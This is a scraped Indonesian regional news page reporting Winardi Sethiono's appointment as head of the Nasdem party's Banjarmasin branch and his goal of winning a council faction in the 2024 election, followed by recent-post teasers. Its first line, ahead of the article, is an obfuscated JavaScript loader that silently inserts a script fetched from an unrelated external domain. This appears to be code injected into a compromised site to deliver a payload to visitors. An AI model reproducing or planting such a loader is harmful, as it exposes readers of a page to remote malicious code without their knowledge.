(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');
Categories: PILKADA BANJARMASIN

Pimpin Nasdem Banjarmasin, Winardi Targetkan Fraksi di DPRD Banjarmasin pada Pemilu 2024


KANALKALIMANTAN.COM, BANJARMASIN – Kepengurusan DPD Partai Nasdem Kota Banjarmasin secara resmi berganti. Sebelumnya, Ketua DPD Partai Nasdem Banjarmasin dipimpin oleh Ahmad Zainuddin Djahrie.

Berdasarkan SK DPP Partai Nasdem yang dikeluarkan pada 17 Juli 2020 silam, kepemimpinan DPD Partai Nasdem Banjarmasin kini dipercayakan kepada Winardi Sethiono. Winardi sendiri, akan memimpin Partai Nasdem Banjarmasin masa bakti 2020-2024.

“Di dalam kepengurusan ini, selain terdiri dari anggota-anggota baru, disitu juga ada anggota-anggota lama yang ingin berjuang membesarkan Partai Nasdem Banjarmasin.

Jadi kita campur itu,” kata Winardi usai serah terima kepengurusan DPD Nasdem Banjarmasin, di salah satu rumah makan di kawasan Dharma Praja, Kelurahan Pemurus Luar, Banjarmasin, Sabtu (19/8/2020) siang.

Setelah mendapat mandat kepemimpinan partai, Winardi pun menargetkan agar Partai Nasdem dapat membentuk fraksi sendiri di DPRD Kota Banjarmasin, pada Pemilu 2024 mendatang. Selama ini, partai besutan Surya Paloh ini memiliki 1 kursi di DPRD Kota Banjarmasin.

“Insyaallah kalau Allah mengizinkan, jika teman-teman bekerjasama yang bagus. Kita paling tidak mendapatkan satu fraksi di DPRD,” imbuh Winardi.

Ditanya strategi pemenangan pasangan calon (paslon) di Pilkada Banjarmasin, Winardi menyebut hal itu sudah disusun oleh tim pemenangan. Seperti diketahui, Partai Nasdem turut serta bergabung dalam koalisi bapaslon Hj. Ananda – H. Mushaffa Zakir di Pilkada Banjarmasin.

“Soal paslon, pengusungan dan penunjukan dukungan itu langsung dari pusat (DPP Partai Nasdem). Jadi bukan kita yang mengusulkan.

Misalnya kita mengusulkan paslon A atau B, tetapi jika (keputusan) pusat datang mendukung paslon C, kita harus tegak lurus terhadap kebijakan partai,” tandas Winardi. (Kanalkalimantan.com/fikri)

 

Repoter: Fikri
Editor: Cell


Desy Arfianty

Recent Posts

Pembebasan Lahan Bendungan Riam Kiwa Mendesak Atasi Banjir Tahunan

KANALKALIMANTAN.COM, BANJARMASIN - Balai Wilayah Sungai (BWS) Kalimantan III menyatakan kesiapan mempercepat pembangunan Bendungan Riam… Read More

40 menit ago

Cek Pelayanan Kesehatan Berjalan Optimal, Bupati Wiyatno Audiensi ke RSUD Kapuas

KANALKALIMANTAN.COM, KUALA KAPUAS - Bupati Kapuas H Muhammad Wiyatno melakukan kunjungan kerja sekaligus audiensi dengan… Read More

4 jam ago

67 Ribu Warga Tak Lagi Ditanggung BPJS Kesehatan, Pemko Banjarmasin Upayakan Pengaktifan Kembali

KANALKALIMANTAN.COM, BANJARMASIN — Masyarakat di Kota Banjarmasin sangat terpukul dengan kebijakan penonaktifan massal kepesertaan BPJS… Read More

20 jam ago

Janji Wali Kota Yamin Tertibkan Bangunan di Atas Sungai

KANALKALIMANTAN.COM, BANJARMASIN — Wali Kota Banjarmasin, H Muhammad Yamin HR menyoroti bangunan yang berdiri di… Read More

22 jam ago

MAFINDO Kalsel Bekali Guru di Banjarmasin Memahami Teknologi Kecerdasan Buatan

KANALKALIMANTAN.COM, BANJARMASIN - Membuka tahun 2026, Masyarakat Anti Fitnah Indonesia (MAFINDO) Kalimantan Selatan (Kalsel) menggelar… Read More

22 jam ago

Pengelolaan UNESCO Global Geopark Meratus Diperkuat

Saat ini Ada 17 Situs Geologi Utama, 50 Titik Potensial Masih Dikaji Read More

1 hari ago

This website uses cookies.